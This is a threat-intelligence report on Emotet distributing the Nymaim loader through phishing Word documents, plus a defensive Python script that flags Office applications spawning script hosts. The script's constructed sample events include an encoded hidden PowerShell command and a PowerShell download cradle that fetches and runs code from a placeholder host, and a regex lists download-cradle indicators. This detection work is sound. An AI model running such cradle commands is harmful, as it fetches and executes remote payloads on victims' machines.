Emotet-Distributed Ransomware Loader for Nozelesn Found via Managed Detection and Response (Mar 29, 2019)
The banking trojan "Emotet" has been observed distributing the "Nymaim" malware onto infected devices, according to researchers from Trend Micro. Emotet is distributed through phishing emails carrying a malicious Word document; in the observed instance, the document was downloaded via a web browser, Google Chrome. Once opened, the document runs a PowerShell script that ultimately downloads Emotet. Emotet then connects to its Command and Control (C2) server to obtain instructions to download additional malware, specifically Nymaim, and execute it on the system.
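The infection chain above (Word document opens, PowerShell is spawned, a downloader fetches the next stage) leaves a well-known footprint in endpoint telemetry: an Office application becoming the parent of a script host, usually with download or encoding switches on the command line. The following is an added detection example, not code from Trend Micro or from the original report. It runs over a handful of constructed Sysmon-style process-creation events (the paths, command lines and `placeholder.invalid` host are all made up for illustration) and flags only those where an Office parent spawns a script host, using the command-line indicators as supporting evidence rather than as a trigger on their own.

```python
import re
from typing import Dict, List

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation).
# These are NOT real telemetry; the encoded/URL payloads are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {  # Word spawning an encoded, hidden PowerShell: the pattern described in the story
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell -w hidden -ep bypass -enc QkFTRTY0X1BMQUNFSE9MREVS",
    },
    {  # Benign: the user opening a browser from the desktop
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "command_line": "chrome.exe",
    },
    {  # Benign Office child: the print spooler helper Word launches on its own
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\splwow64.exe",
        "command_line": "splwow64.exe 12288",
    },
    {  # Word -> cmd -> PowerShell download cradle (URL is a constructed placeholder)
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": 'cmd /c powershell.exe -nop -c "IEX (New-Object Net.WebClient)'
                        '.DownloadString(\'http://placeholder.invalid/x\')"',
    },
]

# Office applications that should rarely, if ever, launch a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and LOLBins commonly abused as the first hop after a macro fires.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line switches and cmdlets typical of download cradles and hidden execution.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-ep\s+bypass|downloadstring|downloadfile|"
    r"\biex\b|invoke-expression|webclient|invoke-webrequest)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the list of reasons an event looks like Office-spawned script execution."""
    reasons: List[str] = []
    parent, child = basename(ev["parent_image"]), basename(ev["image"])
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"office_spawns_script_host:{parent}->{child}")
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_ARGS.finditer(ev["command_line"])})
    if hits:
        reasons.append("suspicious_args:" + ",".join(hits))
    return reasons


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Alert only when the Office -> script-host relationship is present.

    Command-line indicators alone are too noisy (admin scripts use -enc and
    WebClient legitimately); they are kept as supporting context on the alert.
    """
    alerts: List[Dict[str, object]] = []
    for idx, ev in enumerate(events):
        reasons = score_event(ev)
        if any(r.startswith("office_spawns_script_host") for r in reasons):
            alerts.append({"index": idx, "child": basename(ev["image"]), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Against the constructed sample, events 0 and 3 alert while the browser launch and the `splwow64.exe` child are ignored, which is the behaviour you want: the parent/child relationship is the high-fidelity signal, and the argument matches explain why the analyst should look first.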
Recommendation: Files that prompt the user to enable content in order to view the document are a common sign of a phishing attack. If such a file arrives from a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening it. Likewise, any such attachment from an unknown sender should be viewed with the utmost scrutiny, left unopened, and reported to the appropriate personnel.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.